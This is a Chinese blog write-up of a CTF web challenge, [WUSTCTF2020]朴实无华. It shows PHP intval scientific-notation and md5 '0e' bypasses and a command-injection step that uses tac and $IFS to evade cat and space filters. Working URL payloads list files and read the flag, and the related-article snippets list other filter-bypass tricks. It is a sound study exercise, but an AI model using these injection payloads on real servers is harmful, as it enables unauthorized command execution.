[WUSTCTF2020]朴实无华 md5特殊值/intval绕过/过滤空格

最新推荐文章于 2024-08-07 20:00:00 发布
最新推荐文章于 2024-08-07 20:00:00 发布
阅读量199 收藏
点赞数
分类专栏: BUUctf 文章标签: java 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133015537
版权

dirsearch扫吧

然后就可以得到 robots.txt了 记得降低点线程

-t 50 这样

我们去访问一下

去看看 但是这个文件名一看就是fake的

抓抓包看看有没有传递什么吧

这里不是很顺的 其实前面耶抓包看看了 但是没有东西就不放上来了

访问一下咯

乱码 火狐 ALT -> 查看 -> 修复文字编码 即可

intval 科学计数法绕过

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

第一个 是关于 intval的漏洞

intval(num,进制)

这里主要 可以通过进制的方式绕过 因为默认是10进制

这里主要是通过 科学计数法绕过


1e10 会被识别为1

但是 1e10+1后就会恢复原本
<?php
$a='1e10';
echo intval($a);
echo "<br />";
echo intval($a+1);

所以我们传入 ?num=1e10

md5特殊

}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

这里主要是特殊的MD5 加密后是和原本值一样 我们去搜一下就行了0e215962017

过滤空格和替换cat

cat可以使用tac

空格可以使用$IFS

我们先看看我们要读取什么文件

?num=1e10&md5=0e215962017&get_flag=ls

 

 多半就是猎奇的flag了

?num=1e10&md5=0e215962017&get_flag=tac$IFS'fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag'

双层小牛堡
关注
专栏目录
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 674
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
ctfMD5绕过详细总结及例题[BJDCTF2020]Easy MD5
m0_56691564的博客
10-18 5159
MD5()函数简单了解及ctf中常见绕过技巧,结尾附加例题。
CTFHUB-过滤空格
Web学习之路
03-28 284
替换
CTFHub | 过滤空格
尼泊罗河伯的博客
12-04 2563
根据网页显示内容提示,这题关于过滤空格注入,此题和其他的注入手法一致,只不过需要在网页 URL 中对 payload 语句中的空格符号进行过滤,判断发现此题存在过滤空格注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHUB-web-RCE-过滤空格
最新发布
weixin_68416970的博客
08-07 171
因为这题过滤空格,如果在 URL 中输入空格,则不会执行 ping 命令。那么这里将空格替换为 %09 ,也就是 ASCII 的 Tab 键。右键检查网页源代码发现了 flag。在 URL 后面拼接使用管道符执行注入,发现了 flag 的可疑文件。
CTFhub】命令注入—过滤空格
manerzi的博客
10-25 710
CTFhub】命令注入—过滤空格
CTFHub技能书解题笔记-RCE-过滤空格过滤目录分隔符、过滤运算符
qq_43006864的博客
04-01 4124
一、过滤空格 过滤空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
WEB狗的各种绕过 —— 【WUST-CTF2020】朴实无华
Ve99tr’s Blog
03-30 4640
web狗的各种绕过intval函数绕过、双重MD5以及==弱类型、空格过滤绕过
WEB攻防基础|PHP|过滤函数intval()绕过原理及方法
m0_73615178的博客
12-19 1669
intval()函数: 绕过方法思路总结: 一、进制类型转换: 二、弱比较(a==b),可以给a、b两个参数传入数组,使弱比较为true: 三、增加小数位: 四、转换字符串: 五、取反: 六、运用算数运算符:
javaMD5加密以及两次MD5加密
Selenium的博客
06-01 4181
java中实现MD5加密通常有两种方法 方法一:通过java自带的java.security.MessageDigest实现加密 package com.wantao.md5; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.util.Base64; pub...
ctfshow-萌新-web1( 利用intval函数的特性获取敏感数据)
热门推荐
wangyuxiang946的博客
09-08 1万+
ctf.show 萌新模块的web1关, 这一关考察的是intval()函数转换字符串时的特性以及SQL的拼接绕过 这一关直接就给了源码, 并提示我们 id = 1000 时, 就是flag 先分析一下源码, 首先是 intval()函数将参数id转换为数型, id > 999直接die()结束程序, 也就是说我们传递的id不能大于 999, 明知道1000就是flag, 但不能直接传1000, 否则程序会直接die()结束, 传递的id 即不能大于999, 又需要查询 1...
云演CTF: 004.intval
wanguixiu的博客
06-09 1039
云演CTF: 004.intval 作者: admin 时间: 2021-05-27 分类: 云演CTF 进去直接给了代码<?php if(!isset($_GET['source'])){ highlight_file('index.php'); die(); } include('flag.php'); $key1 ...
php的intval函数
weixin_30852367的博客
06-03 486
PHP intval() 函数 PHP 可用的函数PHP 可用的函数 intval() 函数用于获取变量的整数intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 PHP 4, PHP 5, PHP 7 语法...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 925
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
ctfshow-萌新-web2( 利用intval函数特性配合SQL的特殊符号获取敏感数据 )
wangyuxiang946的博客
09-09 1万+
ctf.show 萌新模块 web2关,此关卡使用intval()函数强制将参数转换成数型,可以使用字符绕过,配合特殊符号控制SQL的查询结果,从而获取flag,这一关过滤了or,我们可以使用加号,减号,乘号,除号,或,左移等方式绕过 页面中给出了源码,并提示我们 id=1000时,即可获取flag 这里有两个关键点,首先是intval()函数的转换,我们可以利用intval函数转换字符串时的特性,来绕过校验,输入一下payload,即可获取flag ?id=2*500 ...
intval md5绕过之[WUSTCTF2020]朴实无华
qq_58970968的博客
07-24 1125
intval函数还可以用于判断回文串,因为intval函数的最大取决于操作系统,如果字符串的回文超过了最大的范围,那么返回的就也是原来的字符串,就会变成回文串,实现了绕过。函数的使用方法,当函数中用字符串方式表示科学计数法时,函数的返回是科学计数法前面的一个数,而对于科学计数法加数字则会返回科学计数法的数。$a==md5($a)时使用科学计数0e215962017。可以使用0e开头的科学计数来绕过,使用。扫描文件发现robots.txt;==bmd要相等;使用工具,或者数组;...
PHP特性之CTF中常见的PHP绕过
Welcome To Myon'Blog !
07-18 6386
一、关于md5()和sha1()的常见绕过 1、使用数组绕过 2、 使用特殊字符串绕过 二、strcmp绕过 三、switch绕过 四、intval绕过
CTFhub-RCE-过滤空格
ssss39的博客
11-16 411
IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。< 、>、、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等。2. 查看 flag_890277429145.php。1. 查看当前目录:127.0.0.1|ls。
// 定义链表节点结构体 struct ListNode { int val; ListNode *next;
05-24
// 构造函数 ListNode(int x) : val(x), next(NULL) {} }; 这是一个简单的链表节点结构体,包含一个整型变量 val 和一个指向下一个节点的指针 next。构造函数用于初始化 val 和 next 指针,其中 val 初始化为 x,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值